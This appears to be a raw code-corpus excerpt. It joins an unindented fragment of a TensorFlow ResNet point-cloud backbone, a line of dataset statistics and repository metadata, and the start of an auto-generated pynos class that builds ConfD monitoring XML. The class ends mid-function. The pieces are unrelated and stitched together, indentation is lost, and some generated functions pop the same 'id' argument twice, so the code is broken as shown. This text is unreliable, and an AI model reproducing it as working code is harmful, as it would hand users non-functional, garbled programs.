out_fdim // bottleneck_ratio,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('conv2'):
x = LocalAggregation(config,
query_points=inputs['points'][layer_ind + 1],
support_points=inputs['points'][layer_ind],
neighbors_indices=inputs['pools'][layer_ind],
features=x,
scope='local_aggregation',
radius=radius,
out_fdim=out_fdim // bottleneck_ratio,
is_training=is_training,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('conv3'):
x = conv1d_1x1(x,
out_fdim,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=None,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('shortcut'):
# Pool shortcuts to strided points TODO: max_pool or closest_pool ?
shortcut = ind_max_pool(features, inputs['pools'][layer_ind], 'max_pool')
# shortcut = ind_closest_pool(features, neighbors_indices,'closest pool')
# Regular upsample of the features if not the same dimension
if int(shortcut.shape[1]) != out_fdim:
shortcut = conv1d_1x1(shortcut,
out_fdim,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=None,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
if activation_fn == 'relu':
output = tf.nn.relu(x + shortcut)
elif activation_fn == 'leaky_relu':
output = tf.nn.leaky_relu(x + shortcut, alpha=0.2)
else:
output = x + shortcut
return output
def resnet_backbone(config,
inputs,
features,
base_radius,
base_fdim,
bottleneck_ratio,
depth,
is_training,
init='xavier',
weight_decay=0,
activation_fn='relu',
bn=True,
bn_momentum=0.98,
bn_eps=1e-3):
"""Resnet Backbone
Args:
config: config file
inputs: a dict contains all inputs
features: input features
base_radius: the first ball query radius
base_fdim: the base feature dim
bottleneck_ratio: bottleneck_ratio
depth: num of bottleneck in a stage
is_training: True indicates training phase
init: weight initialization method
weight_decay: If > 0, add L2Loss weight decay multiplied by this float.
activation_fn: Activation function
bn: If True, add batch norm after convolution
Returns:
A list of all stage features
"""
with tf.variable_scope('resnet_backbone') as sc:
fdim = base_fdim
radius = base_radius
layer_idx = 0
F = []
features = conv1d_1x1(features, fdim, 'res1_input_conv', is_training=is_training, with_bias=False, init=init,
weight_decay=weight_decay, activation_fn=activation_fn, bn=bn, bn_momentum=bn_momentum,
bn_eps=bn_eps)
features = simple_block(layer_idx, config, inputs, features, 'res1_simple_block',
radius=radius, out_fdim=fdim, is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum, bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res1_bottleneck{i}',
radius=radius, out_fdim=2 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
layer_idx += 1
features = strided_bottleneck(layer_idx - 1, config, inputs, features, 'res2_strided_bottleneck',
radius=radius, out_fdim=4 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res2_bottleneck{i}',
radius=2 * radius, out_fdim=4 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
layer_idx += 1
features = strided_bottleneck(layer_idx - 1, config, inputs, features, 'res3_strided_bottleneck',
radius=2 * radius, out_fdim=8 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res3_bottleneck{i}',
radius=4 * radius, out_fdim=8 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
layer_idx += 1
features = strided_bottleneck(layer_idx - 1, config, inputs, features, 'res4_strided_bottleneck',
radius=4 * radius, out_fdim=16 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res4_bottleneck{i}',
radius=8 * radius, out_fdim=16 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
layer_idx += 1
features = strided_bottleneck(layer_idx - 1, config, inputs, features, 'res5_strided_bottleneck',
radius=8 * radius, out_fdim=32 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res5_bottleneck{i}',
radius=16 * radius, out_fdim=32 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
return F
| 44.949622 | 117 | 0.479126 | 1,673 | 17,845 | 4.849372 | 0.093843 | 0.070504 | 0.059164 | 0.049304 | 0.838038 | 0.827561 | 0.819919 | 0.812523 | 0.812523 | 0.800074 | 0 | 0.014761 | 0.457103 | 17,845 | 396 | 118 | 45.063131 | 0.822667 | 0.158476 | 0 | 0.800687 | 0 | 0 | 0.035855 | 0.006247 | 0 | 0 | 0 | 0.002525 | 0 | 1 | 0.013746 | false | 0 | 0.013746 | 0 | 0.041237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
06e0a393b0d5a514a671925c327d7dee2087663c | 314,125 | py | Python | pynos/versions/ver_7/ver_7_1_0/yang/tailf_confd_monitoring.py | bdeetz/pynos | bd8a34e98f322de3fc06750827d8bbc3a0c00380 | [
"Apache-2.0"
] | 12 | 2015-09-21T23:56:09.000Z | 2018-03-30T04:35:32.000Z | pynos/versions/ver_7/ver_7_1_0/yang/tailf_confd_monitoring.py | bdeetz/pynos | bd8a34e98f322de3fc06750827d8bbc3a0c00380 | [
"Apache-2.0"
] | 10 | 2016-09-15T19:03:27.000Z | 2017-07-17T23:38:01.000Z | pynos/versions/ver_7/ver_7_1_0/yang/tailf_confd_monitoring.py | bdeetz/pynos | bd8a34e98f322de3fc06750827d8bbc3a0c00380 | [
"Apache-2.0"
] | 6 | 2015-08-14T08:05:23.000Z | 2022-02-03T15:33:54.000Z | #!/usr/bin/env python
import xml.etree.ElementTree as ET
class tailf_confd_monitoring(object):
"""Auto generated class.
"""
def __init__(self, **kwargs):
self._callback = kwargs.pop('callback')
def confd_state_version(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
version = ET.SubElement(confd_state, "version")
version.text = kwargs.pop('version')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_smp_number_of_threads(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
smp = ET.SubElement(confd_state, "smp")
number_of_threads = ET.SubElement(smp, "number-of-threads")
number_of_threads.text = kwargs.pop('number_of_threads')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_epoll(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
epoll = ET.SubElement(confd_state, "epoll")
epoll.text = kwargs.pop('epoll')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_daemon_status(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
daemon_status = ET.SubElement(confd_state, "daemon-status")
daemon_status.text = kwargs.pop('daemon_status')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_read_only_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
read_only_mode = ET.SubElement(confd_state, "read-only-mode")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_upgrade_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
upgrade_mode = ET.SubElement(confd_state, "upgrade-mode")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
mode = ET.SubElement(ha, "mode")
mode.text = kwargs.pop('mode')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_node_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
node_id = ET.SubElement(ha, "node-id")
node_id.text = kwargs.pop('node_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_master_node_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
master_node_id = ET.SubElement(ha, "master-node-id")
master_node_id.text = kwargs.pop('master_node_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name = ET.SubElement(data_model, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_revision(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
revision = ET.SubElement(data_model, "revision")
revision.text = kwargs.pop('revision')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_namespace(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
namespace = ET.SubElement(data_model, "namespace")
namespace.text = kwargs.pop('namespace')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_prefix(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
prefix = ET.SubElement(data_model, "prefix")
prefix.text = kwargs.pop('prefix')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_exported_exported_to_all_exported_to_all(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
exported = ET.SubElement(data_model, "exported")
exported_to_all = ET.SubElement(exported, "exported-to-all")
exported_to_all = ET.SubElement(exported_to_all, "exported-to-all")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_ssh_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
ssh = ET.SubElement(listen, "ssh")
ip = ET.SubElement(ssh, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_ssh_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
ssh = ET.SubElement(listen, "ssh")
port = ET.SubElement(ssh, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_cli_listen_ssh_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
cli = ET.SubElement(confd_state, "cli")
listen = ET.SubElement(cli, "listen")
ssh = ET.SubElement(listen, "ssh")
ip = ET.SubElement(ssh, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_cli_listen_ssh_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
cli = ET.SubElement(confd_state, "cli")
listen = ET.SubElement(cli, "listen")
ssh = ET.SubElement(listen, "ssh")
port = ET.SubElement(ssh, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_ssl_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
ssl = ET.SubElement(listen, "ssl")
ip = ET.SubElement(ssl, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_ssl_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
ssl = ET.SubElement(listen, "ssl")
port = ET.SubElement(ssl, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_ssl_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
ssl = ET.SubElement(listen, "ssl")
ip = ET.SubElement(ssl, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_ssl_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
ssl = ET.SubElement(listen, "ssl")
port = ET.SubElement(ssl, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_listen_udp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
listen = ET.SubElement(snmp, "listen")
udp = ET.SubElement(listen, "udp")
ip = ET.SubElement(udp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_listen_udp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
listen = ET.SubElement(snmp, "listen")
udp = ET.SubElement(listen, "udp")
port = ET.SubElement(udp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v1(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v1 = ET.SubElement(version, "v1")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v2c(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v2c = ET.SubElement(version, "v2c")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v3(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v3 = ET.SubElement(version, "v3")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_engine_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
engine_id = ET.SubElement(snmp, "engine-id")
engine_id.text = kwargs.pop('engine_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id = ET.SubElement(callpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
